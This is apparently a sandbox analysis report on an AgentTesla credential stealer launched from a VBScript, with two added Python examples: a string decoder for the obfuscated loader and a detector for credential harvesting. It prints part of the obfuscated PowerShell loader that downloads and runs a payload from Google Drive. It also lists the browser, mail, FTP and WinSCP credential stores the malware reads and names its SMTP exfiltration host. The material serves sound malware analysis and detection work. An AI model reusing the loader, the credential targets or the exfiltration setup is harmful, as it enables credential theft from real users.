hens0homop ';$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,hcoldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';$noncombustible173=fritidsmuligheds 'botet>trskn ';$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';$museumsgenstande='haplessnesses';exuberate (fritidsmuligheds 'rustfsr ppeeunquotpa,as-lnforcreubeosmovsntransttweene costnbesantscler ejnar-electpunaddalobeltflusthafhng ilittneigh:unlar\ gul s,oninobeha,maheyrbtriale .remrpestii footsreno.hgylte. nutlt v.luxda.nitcigar mi.k- rt svlindaasta.nlcavalu iliaefun,t godmo$ ultrmhim eu.affesklarledelf uekspamsalams lommgbenchehnsesn resisl,mbetclevea patensteridpistoescrei;su,fe ');exuberate (fritidsmuligheds ' a,niidendrffortr i.raf(elefatunspieski.dstermittid,e-li iepsmiggatal ht overh gulv u,tet rors:t.aum\scarlsflyttotilhymcame,bunc,aehaandrsyri.iter is uhaahbiory.retint lumixprobit rrlg) expi{concleredbuxf.deri galmtc.ort} ledd;.ksam ');$chaussebrolgningens = fritidsmuligheds 'chan.erenticwh.elhmyarioo ist fibr%lgnera edlgpgrsropmyrekdkapitalivsvtgrapla,utde%capen\quinocsadacostrmhl bahue snniosummapans,atbengnietchilinc.nuo.erammoudi.sordiuslagtnvkstrwstran despo& hjl&heter peakemetamcharmohstumpoghost .eapf$sepul ';exuberate (fritidsmuligheds ' itch$ afrigneotel fejloku,esbsen,eaunspilsams,:oprres siveufandaprecogppregelpistei sk,nc sionaverdethalvfeun.il= m dn(inddacmytilm skoldstilg m nha/fortrcanted u.gdo$trretcsprouhskilbalamm,u a emse entsskaaremudpubtmre,rvelloounderl 
            beebgsp,eanordknibuld nxan
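The two helper functions in that command line are the whole of the first-stage string protection. fritidsmuligheds walks its argument with substring (spelled 'substrin'+'g' so the keyword never appears literally), taking one character at index 5, 11, 17, ... and stopping one short of the end; exuberate runs its argument through &($arbejdsvrelser), and $arbejdsvrelser decodes to iex, so every exuberate(...) call is an Invoke-Expression of freshly decoded code. This is what the "Found suspicious powershell code related to unpacking or dynamic code loading" signature is keyed on. The following Python is an added example for this page, not part of the Joe Sandbox report: it reads the start, stride and tail parameters out of the function definition and decodes every string assigned through it. The excerpt it runs on is copied from the command line above as the sandbox prints it (lower-cased); the $flokkede user-agent string and the exuberate(...) bodies are left out because the page's rendering collapses runs of spaces inside them, which desynchronises the stride.

```python
import re

# Constructed excerpt of the obfuscated command line as the report prints it
# (the sandbox lower-cases it). Only strings that decode cleanly are kept:
# the page collapses runs of spaces, which desynchronises the stride for the
# strings whose padding contained them (the $flokkede user-agent string).
CMDLINE = (
    "$utmmeligheds = 1;$skimme='substrin';$skimme+='g';"
    "function fritidsmuligheds($udrejseforbuddene){"
    "$valetism=$udrejseforbuddene.length-$utmmeligheds;"
    "for($syring=5; $syring -lt $valetism; $syring+=(6))"
    "{$fundamentalismen+=$udrejseforbuddene.$skimme.invoke($syring, $utmmeligheds);}"
    "$fundamentalismen;}"
    "function exuberate($lavrss){&($arbejdsvrelser) ($lavrss);}"
    "$medicopsychological=fritidsmuligheds ' befluagi,ns lac eove,frpolya-apoteawardegtre cesa,kenpo.tot,wist ';"
    "$infection=fritidsmuligheds ',ingmhmodhat afmgtdissop cilis au,o:flamb/ seku/ ,elnd extrruds,yiparagv"
    " pseue fati.drowngevighobr.ttoorg,ngkrakelmikroeundep.fo micaffalopanermwe eg/van butiresc usrp?decolep.enyx"
    " an.lpproduofootlrspooftbaand= slutdch.huofo,skwbeic,n forhlpictoo.uropalagridopsam&vindeicommedmissi=upbla1john,h"
    "coldnpravnembetjer ber wkn.glx nstedtrforwtrninncarioi trbe6sportxcount5 vvefgerhveyskuess sweemcolpeih,len9"
    "kandivsign.6tarmreskimokco,cijtvangz begii entrt met,1buglega gel-retretprog.t erve ';"
    "$noncombustible173=fritidsmuligheds 'botet>trskn ';"
    "$arbejdsvrelser=fritidsmuligheds 'selviisuperein skxbredb ';"
)

# Shape of the decoder definition: function NAME($ARG){$x=$ARG.length-$TAIL;
# for($i=START; $i -lt $x; $i+=(STEP)) ... }. Variable names are random per
# sample, so everything except the keywords is matched generically.
DEF_RE = re.compile(
    r"function (?P<name>\w+)\(\$(?P<arg>\w+)\)\{"
    r"\$\w+=\$(?P=arg)\.length-\$(?P<tail>\w+);"
    r"for\(\$\w+=(?P<start>\d+);\s*\$\w+ -lt \$\w+;\s*\$\w+\+=\((?P<step>\d+)\)\)"
)


def find_decoder(script):
    """Return (function name, start index, stride, tail) of the stride decoder."""
    m = DEF_RE.search(script)
    if not m:
        raise ValueError("no substring-stride decoder found")
    # The tail is a variable ($utmmeligheds = 1 here); resolve its literal value.
    tail_m = re.search(r"\$" + re.escape(m.group("tail")) + r"\s*=\s*(\d+)", script)
    if not tail_m:
        raise ValueError("tail variable has no literal assignment")
    return m.group("name"), int(m.group("start")), int(m.group("step")), int(tail_m.group(1))


def decode(blob, start=5, step=6, tail=1):
    """Replicate the loop: blob[i] for i = start, start+step, ... while i < len(blob) - tail."""
    return "".join(blob[i] for i in range(start, len(blob) - tail, step))


def decode_all(script):
    """Decode every $var=NAME '...' assignment; returns {var: plaintext}."""
    name, start, step, tail = find_decoder(script)
    assign = re.compile(r"\$(\w+)\s*=\s*" + re.escape(name) + r"\s+'([^']*)'")
    return {var: decode(blob, start, step, tail) for var, blob in assign.findall(script)}


def invoker(script, decoded):
    """Find the wrapper that does &($var) $x and resolve $var; None if absent."""
    m = re.search(r"function (\w+)\(\$\w+\)\{&\(\$(\w+)\)", script)
    return (m.group(1), decoded.get(m.group(2))) if m else None


if __name__ == "__main__":
    strings = decode_all(CMDLINE)
    for var, text in strings.items():
        print(f"${var} = {text!r}")
    print("call-through wrapper:", invoker(CMDLINE, strings))
```

Decoded, $medicopsychological is the header name user-agent, $noncombustible173 is the redirection character >, $arbejdsvrelser is iex, and $infection is the Google Drive download URL (https://drive.google.com/uc?export=download&id=...) behind the powershell.exe connections to drive.google.com and drive.usercontent.google.com shown later in the report. Because the parameters are parsed rather than hard-coded, the same code handles variants that change the start index, stride or tail.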
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 22_2_005F3675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 22_2_005F3675
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wab.exe PID: 316, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\FTP Navigator\Ftplist.txt
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wab.exe PID: 316, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wab.exe PID: 316, type: MEMORYSTR
            MITRE ATT&CK matrix (one row per line, columns separated by |; a number in brackets is the signature counter the report shows next to that technique, and cells without one are unpopulated template cells):
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Scripting [221] | Valid Accounts | Windows Management Instrumentation [231] | Scripting [221] | DLL Side-Loading [1] | Disable or Modify Tools [1] | OS Credential Dumping [2] | System Time Discovery [1] | Remote Services | Archive Collected Data [1] | Ingress Tool Transfer [1] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Exploitation for Client Execution [1] | DLL Side-Loading [1] | Process Injection [111] | Obfuscated Files or Information [2] | Credentials in Registry [1] | File and Directory Discovery [1] | Remote Desktop Protocol | Data from Local System [2] | Encrypted Channel [11] | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter [112] | Registry Run Keys / Startup Folder [1] | Registry Run Keys / Startup Folder [1] | Software Packing [1] | Security Account Manager | System Information Discovery [35] | SMB/Windows Admin Shares | Email Collection [1] | Non-Standard Port [1] | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | PowerShell [2] | Login Hook | Login Hook | Timestomp [1] | NTDS | Query Registry [1] | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol [2] | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading [1] | LSA Secrets | Security Software Discovery [541] | SSH | Keylogging | Application Layer Protocol [13] | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading [1] | Cached Domain Credentials | Process Discovery [1] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion [261] | DCSync | Virtualization/Sandbox Evasion [261] | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection [111] | Proc Filesystem | Application Window Discovery [1] | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Hidden Files and Directories [1] | /etc/passwd and /etc/shadow | System Network Configuration Discovery [1] | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Rundll32 [1] | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Behavior graph (ID 1430754, sample G4-TODOS.vbs, start date 24/04/2024, architecture WINDOWS, score 100), recovered from the graph's text:
            Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures. Contacted hosts: mail.cash4cars.nz, ip-api.com, 2 other IPs or domains.
            Process tree:
            wscript.exe (G4-TODOS.vbs)
                signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
                powershell.exe
                    network: drive.google.com 142.250.101.113 port 443 (local ports 49706, 49711) and drive.usercontent.google.com 142.251.2.132 port 443 (local ports 49707, 49712), GOOGLEUS, United States
                    signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                    powershell.exe
                        signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                        wab.exe
                            network: mail.cash4cars.nz 114.142.162.17 port 26 (local port 49715), SERVERMULE-AS-APNimbus2PtyLtdAU, Australia; ip-api.com 208.95.112.1 port 80 (local port 49714), TUT-ASUS, United States
                            dropped: C:\Users\user\AppData\Roaming\...\newfile.exe (PE32)
                            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
                        cmd.exe
                    conhost.exe
                    cmd.exe
            newfile.exe (started twice from the root)
            rundll32.exe (started from the root)
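The file and registry targets listed under "Stealing of Sensitive Information" above, together with wab.exe's network activity in the behavior graph (the ip-api.com hosting lookup and the SMTP connection to mail.cash4cars.nz on port 26), are the observable side of AgentTesla's harvesting and exfiltration. The following Python is an added example for this page, not part of the Joe Sandbox report, showing one way to turn those observations into a host-level detection: each process is scored on how many credential stores it reads that belong to some other application, and that is combined with the hosting probe and with mail-port egress from a process that is not a mail client. The event stream is constructed to mirror this report (wab.exe PID 316) with benign noise added; the store-to-owner mapping, the family names and the event field names are assumptions of the example, not Sysmon or Joe Sandbox field names.

```python
import re

# Credential stores AgentTesla opened in this report (see the file/registry
# targets above), keyed to a family name and the image names that legitimately
# read them. The owner sets are an assumption of this example; an empty set
# means every reader is treated as foreign.
CREDENTIAL_STORES = [
    (r"\\google\\chrome\\user data\\[^\\]+\\login data$", "chrome", {"chrome.exe"}),
    (r"\\microsoft\\edge\\user data\\[^\\]+\\login data$", "edge", {"msedge.exe"}),
    (r"\\mozilla\\firefox\\profiles\.ini$", "firefox", {"firefox.exe"}),
    (r"\\8pecxstudios\\cyberfox\\profiles\.ini$", "cyberfox", set()),
    (r"\\netgate technologies\\blackhawk\\profiles\.ini$", "blackhawk", set()),
    (r"\\thunderbird\\profiles\.ini$", "thunderbird", {"thunderbird.exe"}),
    (r"^c:\\ftp navigator\\ftplist\.txt$", "ftp navigator", set()),
    (r"\\martin prikryl\\winscp 2\\sessions$", "winscp", {"winscp.exe"}),
    (r"\\windows messaging subsystem\\profiles$", "mapi profiles", {"outlook.exe"}),
    (r"\\incredimail\\identities$", "incredimail", set()),
]
# The hosting/data-centre probe seen in the contacted URLs of this report.
HOSTING_CHECK = re.compile(r"^https?://ip-api\.com/.*[?&]fields=hosting\b")
SMTP_PORTS = {25, 26, 465, 587, 2525}      # 26 is the port used in this report
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed legitimate SMTP senders


def classify_store(target):
    """Return (family, owners) for a credential-store path or key, else (None, None)."""
    t = target.lower()
    for pattern, family, owners in CREDENTIAL_STORES:
        if re.search(pattern, t):
            return family, owners
    return None, None


def assess(events, min_families=3):
    """Per PID: foreign credential-store families read, hosting probe, SMTP egress, verdict."""
    procs = {}
    for ev in events:
        p = procs.setdefault(ev["pid"], {
            "image": ev["image"].lower(), "families": set(),
            "hosting_check": False, "smtp_ports": set(), "alert": False,
        })
        if ev["type"] in ("file_open", "reg_open"):
            family, owners = classify_store(ev["target"])
            if family and p["image"] not in owners:
                p["families"].add(family)
        elif ev["type"] == "http_get" and HOSTING_CHECK.search(ev["target"]):
            p["hosting_check"] = True
        elif ev["type"] == "net_connect":
            port = int(ev["target"].rsplit(":", 1)[1])
            if port in SMTP_PORTS and p["image"] not in MAIL_CLIENTS:
                p["smtp_ports"].add(port)
    for p in procs.values():
        n = len(p["families"])
        # Broad harvesting alone is enough; one foreign read plus the hosting
        # probe and mail egress from a non-mail process is the AgentTesla shape.
        p["alert"] = n >= min_families or (n >= 1 and p["hosting_check"] and bool(p["smtp_ports"]))
    return procs


def _ev(pid, image, kind, target):
    return {"pid": pid, "image": image, "type": kind, "target": target}


# Constructed event stream: wab.exe PID 316 mirrors this report; the other
# processes are benign noise added to show what does not fire.
EVENTS = [
    _ev(316, "wab.exe", "reg_open", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    _ev(316, "wab.exe", "file_open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    _ev(316, "wab.exe", "file_open", r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    _ev(316, "wab.exe", "file_open", r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    _ev(316, "wab.exe", "file_open", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    _ev(316, "wab.exe", "file_open", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    _ev(316, "wab.exe", "file_open", r"C:\FTP Navigator\Ftplist.txt"),
    _ev(316, "wab.exe", "file_open", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    _ev(316, "wab.exe", "reg_open", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    _ev(316, "wab.exe", "reg_open", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    _ev(316, "wab.exe", "http_get", "http://ip-api.com/line/?fields=hosting"),
    _ev(316, "wab.exe", "net_connect", "114.142.162.17:26"),
    _ev(4120, "chrome.exe", "file_open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    _ev(5008, "firefox.exe", "file_open", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    _ev(6210, "outlook.exe", "reg_open", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    _ev(6210, "outlook.exe", "net_connect", "203.0.113.10:587"),
    _ev(7777, "backup.exe", "file_open", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
]

if __name__ == "__main__":
    for pid, p in assess(EVENTS).items():
        print(pid, p["image"], sorted(p["families"]), p["hosting_check"], sorted(p["smtp_ports"]), "ALERT" if p["alert"] else "")
```

wab.exe is the Windows Address Book binary; in this run it hosts the injected AgentTesla payload ("Writes to foreign memory regions" in the graph), so the mismatch between the image name and the stores it reads is the durable signal. The hosting lookup (the report's "Check if machine is in data center or colocation facility") and the port 26 SMTP connection from the same PID corroborate it, and a single-store reader such as the constructed backup.exe does not fire.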

            Source | Detection | Scanner | Label
            G4-TODOS.vbs | 5% | ReversingLabs | Win32.Dropper.Generic

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\newfile\newfile.exe | 0% | ReversingLabs |
            C:\Users\user\AppData\Roaming\newfile\newfile.exe | 0% | Virustotal |

            No Antivirus matches

            Source | Detection | Scanner | Label
            bg.microsoft.map.fastly.net | 0% | Virustotal |
            mail.cash4cars.nz | 2% | Virustotal |

            Source | Detection | Scanner | Label
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
            https://go.micro | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
            http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            http://r3.o.lencr.org0 | 0% | URL Reputation | safe
            http://r3.i.lencr.org/0R | 0% | Avira URL Cloud | safe
            http://mail.cash4cars.nz | 0% | Avira URL Cloud | safe
            https://drive.googP | 0% | Avira URL Cloud | safe
            https://drive.usercontent.googh | 0% | Avira URL Cloud | safe
            https://drive.usercontent.google.comzE | 0% | Avira URL Cloud | safe
            http://mail.cash4cars.nz | 2% | Virustotal |
            http://r3.i.lencr.org/0R | 0% | Virustotal |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
            mail.cash4cars.nz | 114.142.162.17 | true | true | | unknown
            drive.google.com | 142.250.101.113 | true | false | | high
            drive.usercontent.google.com | 142.251.2.132 | true | false | | high
            ip-api.com | 208.95.112.1 | true | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            http://ip-api.com/line/?fields=hosting | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://r3.i.lencr.org/0R | wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://mail.cash4cars.nz | wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
            http://drive.usercontent.google.com | powershell.exe, 00000005.00000002.1942203516.0000022580552000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://go.micro | powershell.exe, 00000005.00000002.1942203516.0000022581566000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/License | powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://drive.google.com/q | wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://drive.googP | powershell.exe, 00000005.00000002.1942203516.00000225821F6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://drive.usercontent.googh | powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://drive.usercontent.google.com/ | wab.exe, 00000012.00000003.2163783606.000000000669E000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://drive.usercontent.google.comzE | powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://drive.google.com | powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.google.com | powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore6lB | powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmp | false | | high
